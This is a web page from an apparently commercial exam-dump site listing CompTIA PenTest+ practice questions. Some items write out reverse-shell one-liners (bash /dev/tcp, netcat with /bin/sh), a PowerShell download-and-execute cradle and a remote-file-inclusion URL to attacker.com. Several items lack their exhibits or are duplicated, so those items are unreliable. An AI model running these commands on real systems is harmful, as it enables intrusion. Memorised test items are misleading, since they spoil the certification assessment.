Home » CompTIA Certification Exam » Up-to-dated PenTest+ (Plus) Certification | CompTIA IT Certifications Exam Dumps with free PT0-001 Exam Questions

Up-to-dated PenTest+ (Plus) Certification | CompTIA IT Certifications Exam Dumps with free PT0-001 Exam Questions

Practice on 2022 updated CompTIA PenTest+ Dumps offered by Certspilot, Our free practice questions will help you in preparation for your CompTIA PenTest+ Exam. You can Download a Complete set of CompTIA PenTest+ PT0-001Dumps from our site, Our PT0-001 PDF contains real exam questions with verified answers and detailed explanations of each answer which help you in understanding the concepts of exam. Learn more about here CompTIA certification Roadmap.

Our below Practice questions will help you in passing your PT0-001 exam on the first attempt.

CompTIA PenTest+ (Plus) PT0-001 Free Dumps Are below let Practice on Free Updated PT0-001 Practice exam.

1. A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

Convert to JAR.

Decompile.

Cross-compile the application.

Convert JAR files to DEX.

Re-sign the APK.

Attach to ADB.

2. A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

Obsolete software may contain exploitable components.

Weak password management practices may be employed.

Cryptographically weak protocols may be intercepted.

Web server configurations may reveal sensitive information.

3. A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In

which of the following areas of the report should the penetration tester put this?

Appendices

Executive summary

Technical summary

Main body

4. A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:

Which of the following is the tester intending to do?

Horizontally escalate privileges.

Scrape the page for hidden fields.

Analyze HTTP response code.

Search for HTTP headers.

5. A penetration tester wants to launch a graphic console window from a remotely compromised host with IP

10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal

From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X [email protected] xterm

From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 [email protected] “xhost+; xterm”

From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000

6. A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:

Which of the following types of vulnerabilities is being exploited?

Forced browsing vulnerability

Parameter pollution vulnerability

File upload vulnerability

Cookie enumeration

7. A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

perl -e 'use SOCKET'; $i='; $p='443;

ssh superadmin@ -p 443

nc -e /bin/sh 443

bash -i >& /dev/tcp//443 0>&1

8. A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

Command injection attack

Clickjacking attack

Directory traversal attack

Remote file inclusion attack

9. Which of the following are MOST important when planning for an engagement? (Select TWO).

Goals/objectives

Architectural diagrams

Tolerance to impact

Storage time for a report

Company policies

10. The following line was found in an exploited machine's history file. An attacker ran the following command:

bash -i >& /dev/tcp/192.168.0.1/80 0> &1

Which of the following describes what the command does?

Performs a port scan.

Grabs the web server's banner.

Redirects a TTY to a remote system.

Removes error logs for the supplied IP.

11. Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?

Lockpicking

Egress sensor triggering

Lock bumping

Lock bypass

12. During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

Disable the network port of the affected service.

Complete all findings, and then submit them to the client.

Promptly alert the client with details of the finding.

Take the target offline so it cannot be exploited by an attacker.

13. A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the

following would BEST meet this goal?

Perform an HTTP downgrade attack.

Harvest the user credentials to decrypt traffic.

Perform an MITM attack.

Implement a CA attack by impersonating trusted CAs.

14. After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ’’changepass.”

-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings" to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass exit

setuid strcmp GLIBC_2.0 ENV_PATH

%s/changepw malloc strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.

Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path '/home/user/'. Then run changepass.

Export the ENV_PATH environmental variable to the path of a writable directory that contains a token- stealing binary titled changepw. Then run changepass.

Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'.

15. A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

nslookup -ns 8.8.8.8 << dnslist.tx

for x in {1...254}; do dig -x 192.168.$x.$x; done

dig -r > echo “8.8.8.8” >> /etc/resolv.conf

16. Given the following Python script:

Which of the following is where the output will go?

To the screen

To a network server

To a file

To /dev/null

17. An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:

HTTP POST method.

HTTP OPTIONS method.

HTTP PUT method.

HTTP TRACE method.

18. A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

Vulnerability scan

Dynamic scan

Static scan

Compliance scan

19. While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

Implement a blacklist.

Block URL redirections.

Double URL encode the parameters.

Stop external calls from the application.

20. A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?

Discovery scan

Stealth scan

Full scan

Credentialed scan

21. A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).

Mandate all employees take security awareness training.

Implement two-factor authentication for remote access.

Install an intrusion prevention system.

Increase password complexity requirements.

Install a security information event monitoring solution.

Prevent members of the IT department from interactively logging in as administrators.

Upgrade the cipher suite used for the VPN solution.

22. A penetration tester is reviewing the following output from a wireless sniffer:

Which of the following can be extrapolated from the above information?

Hardware vendor

Channel interference

Usernames

Key strength

23. An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?

Principle of fear

Principle of authority

Principle of scarcity

Principle of likeness

Principle of social proof

24. A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?

Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing.

Implement new training to be aware of the risks in accessing the application. This training can be decommissioned after the vulnerability is patched.

Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.

Require payroll users to change the passwords used to authenticate to the application. Following the patching of the vulnerability, implement another required password change.

25. A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

Enable HTTP Strict Transport Security.

Enable a secure cookie flag.

Encrypt the communication channel.

Sanitize invalid user input.

26. A penetration tester is performing a code review. Which of the following testing techniques is being performed?

Dynamic analysis

Fuzzing analysis

Static analysis

Run-time analysis

27. During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?

Locating emergency exits

Preparing a pretext

Shoulder surfing the victim

Tailgating the victim

28. Consider the following PowerShell command:

powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1”);Invoke-Cmdlet

Which of the following BEST describes the actions performed by this command?

Set the execution policy.

Execute a remote script.

Run an encoded command.

Instantiate an object.

29. Which of the following excerpts would come from a corporate policy?

Employee passwords must contain a minimum of eight characters, with one being alphanumeric.

The help desk can be reached at 800-passwd1 to perform password resets.

Employees must use strong passwords for accessing corporate assets.

The corporate systems must store passwords using the MD5 hashing algorithm.

30. In which of the following scenarios would a tester perform a Kerberoasting attack?

The tester has compromised a Windows device and dumps the LSA secrets.

The tester needs to retrieve the SAM database and crack the password hashes.

The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.

The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.

31. While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CURRENT_CONFIG

32. A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

dsrm -users “DN=company.com; OU=hq CN=users”

dsuser -name -account -limit 3

dsquery user -inactive 3

dsquery -o -rdn -limit 21

33. Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?

Creating a scope of the critical production systems

Setting a schedule of testing access times

Establishing a white-box testing engagement

Having management sign off on intrusive testing

34. In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?

Brute force the user’s password.

Perform an ARP spoofing attack.

Leverage the BeEF framework to capture credentials.

Conduct LLMNR/NETBIOS-ns poisoning.

35. A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?

Nikto

WAR

W3AF

Swagger

36. A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?

The badge was cloned.

The physical access control server is malfunctioning.

The system reached the crossover error rate.

The employee lost the badge.

37. If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8

Which of the following formats is the correct hash type?

Kerberos

NetNTLMv1

NTLM

SHA-1

38. During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the plaintext password have been unsuccessful.

Which of the following would be the BEST target for continued exploitation efforts?

Operating system: Windows 7 Open ports: 23, 161

Operating system: Windows Server 2016 Open ports: 53, 5900

Operating system: Windows 8.1 Open ports: 445, 3389

Operating system: Windows 8 Open ports: 514, 3389

39. Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?

Peach

CeWL

OpenVAS

Shodan

40. Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?

Peach

CeWL

OpenVAS

Shodan

41. A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

The client has applied a hot fix without updating the version.

The threat landscape has significantly changed.

The client has updated their codebase with new features.

Thera are currently no known exploits for this vulnerability.

42. An attacker uses SET to make a copy of a company’s cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO’s login credentials. Which of the following types of attacks is this an example of?

Elicitation attack

Impersonation attack

Spear phishing attack

Drive-by download attack

43. A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?

nmap -p 22 -iL targets

nmap -p 22 -sL targets

nmap -p 22 -oG targets

nmap -p 22 -oA targets

44. A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

Obtain staff information by calling the company and using social engineering techniques.

Visit the client and use impersonation to obtain information from staff.

Send spoofed emails to staff to see if staff will respond with sensitive information.

Search the internet for information on staff such as social networking sites.

45. During the information gathering phase of a network penetration test for the corp.local domain, which of the following commands would provide a list of domain controllers?

nslookup –type=srv _ldap._tcp.dc._msdcs.corp.local

nmap –sV –p 389 - -script=ldap-rootdse corp.local

net group “Domain Controllers” /domain

gpresult /d corp.local /r “Domain Controllers”

46. A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

Wait outside of the company’s building and attempt to tailgate behind an employee.

Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access.

Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.

Search social media for information technology employees who post information about the technologies they work with.

Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access.

47. A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?

Script kiddies

APT actors

Insider threats

Hacktivist groups

48. A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

Run the application through a dynamic code analyzer.

Employ a fuzzing utility.

Decompile the application.

Check memory allocations.

49. A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.)

Tcpdump

Nmap

Wireshark

SSH

Netcat

Cain and Abel

50. An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?

dig -q any _kerberos._tcp.internal.comptia.net

dig -q any _lanman._tcp.internal.comptia.net

dig -q any _ntlm._tcp.internal.comptia.net

dig -q any _smtp._tcp.internal.comptia.net

51. Click the exhibit button.

Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)

Arbitrary code execution

Session hijacking

SQL injection

Cross-site request forgery

52. A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

Use path modification to escape the application’s framework.

Create a frame that overlays the application.

Inject a malicious iframe containing JavaScript.

Pass an iframe attribute that is malicious.

53. A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.

Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof--of-concept to management.

Notify the development team of the discovery and suggest that input validation be implemented with a professional penetration testing company.

Request that management create an RFP to begin a formal engagement with a professional penetration testing company.

54. A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

Infrastructure is being replaced with similar hardware and software.

Systems administrators are applying the wrong patches.

The organization is not taking action to remediate identified findings.

The penetration testing tools were misconfigured.

Download full version

Related Exams

Are Splunk certifications worth it?

Splunk is a popular software platform used for searching, analyzing, and visualizing machine-generated data. It’s commonly used in fields such as IT, security, and finance to help organizations make data-driven decisions. One way to increase

Latest Microsoft MS-700 Exam Dumps with Free Managing Microsoft Teams Exam preparation questions

Modern Desktop Certification Exam Dumps

About The Author

Certspilot

Certspilot is a platform where you can get to access to free Practice test questions for all IT certification like Microsoft, AWS, CompTIA, Salesforce, Cisco, CISSP and others certifications exam, you can download Updated and Valid Exam Dumps in PDF format and prepare yourself for certification exam in very short time. If you have any other question or need assistance regarding to your certification exam, click on Live Chat Icon and get in touch with our customer support agent, we are available 24/7 for customer support or send email at
[email protected].